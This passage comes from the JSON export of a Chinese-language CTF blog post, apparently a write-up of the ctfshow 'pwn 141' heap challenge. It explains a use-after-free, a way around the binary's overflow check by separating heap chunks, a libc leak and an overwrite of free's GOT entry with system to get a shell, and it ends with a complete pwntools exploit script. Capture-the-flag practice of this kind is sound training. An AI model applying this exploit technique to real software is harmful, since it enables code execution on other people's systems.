href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/19A0B3C5J4LK0Y9S7KYI.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"765\" height=\"453\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/19A0B3C5J4LK0Y9S7KYI.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-263\"  sizes=\"auto, (max-width: 765px) 100vw, 765px\" \/><\/div><\/figure>\n\n\n\n<p id=\"uf475fa73\">delete\u628a\u4e24\u4e2achunk\u90fdfree\u4e86\uff0c\u4f46\u662fdescription\u6307\u9488\u6ca1\u6709\u7f6e\u7a7a\uff0c\u6709uaf<\/p>\n\n\n\n<p id=\"uf9543f38\">show\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/Y2RTLDDBSBQ8T5UEDX6.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"846\" height=\"411\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/Y2RTLDDBSBQ8T5UEDX6.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-264\"  sizes=\"auto, (max-width: 846px) 100vw, 846px\" \/><\/div><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p id=\"u3aeac269\">edit\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div 
class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/LFCY0YWVPJNG8GH36C7B-1024x585.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"585\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/LFCY0YWVPJNG8GH36C7B-1024x585.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-265\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"ubb22925e\">\u8fd9\u4e00\u53e5\u662f\u6ea2\u51fa\u68c0\u6d4b\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/SZBOEXVVDK65WHGQJJ.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"975\" height=\"42\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/SZBOEXVVDK65WHGQJJ.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-266\"  sizes=\"auto, (max-width: 975px) 100vw, 975px\" \/><\/div><\/figure>\n\n\n\n<p 
id=\"ubc1f1266\">\u770b\u8d77\u6765\u5c31\u975e\u5e38\u5947\u602a\uff0c\u6ea2\u51fa\u68c0\u6d4b\u901a\u5e38\u4e0d\u662f\u8fd9\u4e48\u641e\u7684\uff0c\u8fd9\u53e5\u8bdd\u7684\u610f\u601d\u662f\uff0c\u56e0\u4e3a\u662f\u5148\u7533\u8bf7\u7684description\u7684chunk\uff0c\u518d\u7533\u8bf7\u7684\u7ed3\u6784\u4f53\u7684chunk\uff0cdescription\u7684\u5730\u5740\u52a0\u4e0aedit\u7684size\u4e0d\u80fd\u8d8a\u8fc7\u7ed3\u6784\u4f53chunk\u7684\u5730\u5740\u3002\uff08\u56e0\u4e3a\u6309\u7406\u6765\u8bf4\u4ed6\u4eec\u662f\u7d27\u63a5\u7740\u7684\uff09<\/p>\n\n\n\n<p id=\"u94938bee\">\u90a3\u7ed5\u8fc7\u7684\u601d\u8def\u5c31\u662f\uff0c\u6211\u8ba9\u4ed6\u4eec\u4e0d\u6328\u7740\u4e0d\u5c31\u884c\u4e86\uff1f<\/p>\n\n\n\n<p id=\"u4e15e5b1\">\u672c\u9898\u73af\u5883\u662f\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/6NYD3R0_HCX7Z5SWHCSZS.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"951\" height=\"495\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/6NYD3R0_HCX7Z5SWHCSZS.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-267\"  sizes=\"auto, (max-width: 951px) 100vw, 951px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u5501c894\">\u67e5\u770blibc\u7248\u672c\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-embed is-type-wp-embed is-provider-sillyrabbit-039-s-blog wp-block-embed-sillyrabbit-039-s-blog\"><div 
class=\"wp-block-embed__wrapper\">\nhttps:\/\/sillyrabbit.cn\/pwn\/%e5%90%84ubuntu%e7%89%88%e6%9c%ac%e5%af%b9%e5%ba%94%e7%9a%84libc%e7%89%88%e6%9c%ac\n<\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/2T1EY9MXSL9XHYPTJPKL.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"645\" height=\"378\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/2T1EY9MXSL9XHYPTJPKL.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-268\"  sizes=\"auto, (max-width: 645px) 100vw, 645px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u5f493a00\">2.23\uff0c\u8fd8\u6ca1\u6709tcache bin\uff0c\u518d\u672c\u5730\u6362\u4e00\u4e0blibc\uff1a<\/p>\n\n\n\n<p id=\"u70361ad7\">patchelf --set-interpreter \/home\/monke\/Desktop\/glibc-all-in-one\/libs\/2.23-0ubuntu3_i386\/ld-2.23.so pwn<\/p>\n\n\n\n<p id=\"u35abd568\">patchelf --replace-needed libc.so.6 \/home\/monke\/Desktop\/glibc-all-in-one\/libs\/2.23-0ubuntu3_i386\/libc-2.23.so pwn<\/p>\n\n\n\n<p id=\"uc480974c\">\u6ca1\u6709tcache bin\u7684\u8bdd\u5c31\u4e0d\u7528\u8003\u8651\u628a\u5b83\u586b\u6ee1\u7684\u64cd\u4f5c\u4e86\uff0c\u76f4\u63a5\u5c31\u80fd\u5230unsorted bin\u3002<\/p>\n\n\n\n<p id=\"u95a9d330\">\u6240\u4ee5\u5148add\u4e24\u4e2auser\uff0c\u7136\u540edelete user0\uff0c\u5b9e\u9645\u4e0a\u6267\u884c\u4e86\u4e24\u6b21free\uff0cuser0\u7684description\u6307\u9488\u548c\u5b83\u7684\u7ed3\u6784\u4f53\u6307\u9488\u4f1a\u5408\u5e76\u7136\u540e\u653e\u5165unsorted 
bin\u4e2d\uff0c\u6b64\u65f6\u518dadd\u4e00\u4e2auser2\uff0c\u7533\u8bf7\u4e00\u4e2a\u7b26\u5408\u5408\u5e76\u540e\u5927\u5c0f\u7684description\u5c31\u80fd\u62ff\u5230\u8fd9\u4e00\u6574\u5757chunk\uff0c\u7136\u540euser2\u7684\u7ed3\u6784\u4f53\u5c31\u4f1a\u8dd1\u5230\u4e0b\u9762\u53bb\uff0c\u7531\u4e8e\u4e0b\u9762\u8fd8\u6709\u4e00\u4e2auser1\uff0c\u6240\u4ee5user2\u7684description\u548c\u7ed3\u6784\u4f53\u6307\u9488\u5c31\u88abuser1\u9694\u79bb\u5f00\u4e86:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/BHO86K1O_6V3B5B2S76H-1024x498.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"498\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/BHO86K1O_6V3B5B2S76H-1024x498.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-269\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p id=\"ue91dc35f\">\u52a8\u6001\u8c03\u8bd5\uff1a<\/p>\n\n\n\n<p id=\"u4fd63cbe\">add(0x80,b&#8217;aaaa&#8217;,0x80,b&#8217;bbbb&#8217;)<\/p>\n\n\n\n<p id=\"ua181814d\">add(0x80,b&#8217;aaaa&#8217;,0x80,b&#8217;bbbb&#8217;)<\/p>\n\n\n\n<p id=\"uc810654d\">delete(0)<\/p>\n\n\n\n<p id=\"ua1ef9423\">\u6b64\u65f6heap\u5982\u4e0b<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/7GW07L8T7THXFAXS.png'><img class=\"lazyload lazyload-style-1\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"849\" height=\"533\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/7GW07L8T7THXFAXS.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-270\"  sizes=\"auto, (max-width: 849px) 100vw, 849px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u067b39f3\">\u7136\u540e<\/p>\n\n\n\n<p id=\"u5a42cc75\">add user2\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/SNIHAR984WZ3ZPSZK.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"675\" height=\"488\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/SNIHAR984WZ3ZPSZK.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-271\"  sizes=\"auto, (max-width: 675px) 100vw, 675px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/1B0JHJT_7V8BX75IW.png'><img class=\"lazyload lazyload-style-1\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"756\" height=\"927\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/1B0JHJT_7V8BX75IW.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-272\"  sizes=\"auto, (max-width: 756px) 100vw, 756px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u1a11ae45\">\u53ef\u4ee5\u770b\u5230\uff0c\u6b64\u65f6user2\u7684description\u6307\u9488\u548c\u7ed3\u6784\u4f53\u6307\u9488\u7684\u4e24\u4e2achunk\u5df2\u7ecf\u88ab\u9694\u79bb\u4e86\uff0c\u4e5f\u5c31\u610f\u5473\u7740\u7ed5\u8fc7\u4e86\u6ea2\u51fa\u68c0\u6d4b\uff0c\u7136\u540eedit user2\u7684description\u5c31\u53ef\u4ee5\u6ea2\u51fa\u5230user1\u4e86<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/SPAPE0DWSOYE3WXT5I.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"686\" height=\"858\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/SPAPE0DWSOYE3WXT5I.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-273\"  sizes=\"auto, (max-width: 686px) 100vw, 686px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper 
lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/C44TPC1XDX7PJCWBLR_G.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"681\" height=\"867\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/C44TPC1XDX7PJCWBLR_G.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-274\"  sizes=\"auto, (max-width: 681px) 100vw, 681px\" \/><\/div><\/figure>\n\n\n\n<p id=\"u7753997d\">\u7136\u540e\u5c31\u662f\u5e38\u89c4\u64cd\u4f5c\u4e86\uff0c\u6cc4\u9732\u5e76\u8ba1\u7b97libc\u57fa\u5740\uff0c\u7b97\u51fasystem\u5730\u5740<\/p>\n\n\n\n<p id=\"u9de9e90d\">\uff0c\u6539free\u7684got\u503c\u4e3asystem\uff0c\u8c03\u7528\u4e00\u4e2a\u5185\u5bb9\u662fbinsh\u7684chunk\u5c31\u80fdgetshell\uff0c\u4f46\u662f\u6211\u8fd9\u65b0\u6dfb\u52a0\u4e00\u4e2achunk\u4f1a\u62a5\u9519\uff0c\u5e72\u8106\u5c31\u76f4\u63a5\u7528chunk2\uff1a<\/p>\n\n\n\n<p id=\"u139eca9d\">payload=binsh.ljust(0x108,b&#8217;\\x00&#8242;)+p32(110)+p32(0x89)+cyclic(0x80)+p32(0)+p32(0x89)+p32(elf.got[&#8216;free&#8217;])<\/p>\n\n\n\n<p id=\"ufe14908c\">\u5b8c\u6574exp\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *\n\ncontext.log_level = \"info\"\n\nio = process(\"\/home\/monke\/ctfshowpwn\/pwn\")\n\n#io = remote('pwn.challenge.ctf.show', 28257)\n\nelf = ELF('\/home\/monke\/ctfshowpwn\/pwn')\n\nlibc = ELF('\/home\/monke\/Desktop\/glibc-all-in-one\/libs\/2.23-0ubuntu3_i386\/libc-2.23.so')\n\ndef add(size, name,length,text):\n\nio.sendlineafter(\"Action: \",b'0')\n\nio.sendlineafter(\"size of description: 
\",str(size))\n\nio.sendlineafter(\"name: \",name)\n\nio.sendlineafter(\"text length: \",str(length))\n\nio.sendlineafter(\"text: \",text)\n\ndef edit(idx, length,text):\n\nio.sendlineafter(\"Action: \",b'3')\n\nio.sendlineafter(\"index: \",str(idx))\n\nio.sendlineafter(\"text length: \",str(length))\n\nio.sendlineafter(\"text: \",text)\n\ndef delete(idx):\n\nio.sendlineafter(\"Action: \",b'1')\n\nio.sendlineafter(\"index: \",str(idx))\n\ndef show(idx):\n\nio.sendlineafter(\"Action: \",b'2')\n\nio.sendlineafter(\"index: \",str(idx))\n\nadd(0x80,b'aaaa',0x80,b'bbbb')\n\nadd(0x80,b'aaaa',0x80,b'bbbb')\n\ndelete(0)\n\n#gdb.attach(io)\n\nprint(elf.plt&#91;'free'])\n\nadd(0x108,b'aaaa',0x80,b'bbbb')\n\n#gdb.attach(io)\n\nbinsh=b'\/bin\/sh'\n\npayload=binsh.ljust(0x108,b'\\x00')+p32(110)+p32(0x89)+cyclic(0x80)+p32(0)+p32(0x89)+p32(elf.got&#91;'free'])\n\nedit(2,len(payload),payload)\n\n#gdb.attach(io)\n\nshow(1)\n\n#gdb.attach(io)\n\nio.recvuntil('description: ')\n\nfree_addr = u32(io.recv(4))\n\nprint(hex(free_addr))\n\nlibc_base = free_addr-libc.sym&#91;'free']\n\nprint(\"libc_base\",hex(libc_base))\n\nsystem_addr = libc_base+libc.sym&#91;'system']\n\nedit(1,0x8,p32(system_addr))\n\ndelete(2)\n\nio.interactive()<\/code><\/pre>\n\n\n\n<p id=\"u11dab9b4\"><\/p>\n\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>pwn 141\uff08\u7b80\u5355UAF\uff09 \u7ecf\u5178\u83dc\u5355: add_note\uff1a del note\uff1afree\u5b8c\u4e0d\u60ac\u7a7a\uff0c\u6709UAF p 
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[13],"tags":[11],"class_list":["post-211","post","type-post","status-publish","format-standard","hentry","category-13","tag-11"],"_links":{"self":[{"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/posts\/211","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/comments?post=211"}],"version-history":[{"count":7,"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/posts\/211\/revisions"}],"predecessor-version":[{"id":542,"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/posts\/211\/revisions\/542"}],"wp:attachment":[{"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/media?parent=211"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/categories?post=211"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/tags?post=211"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}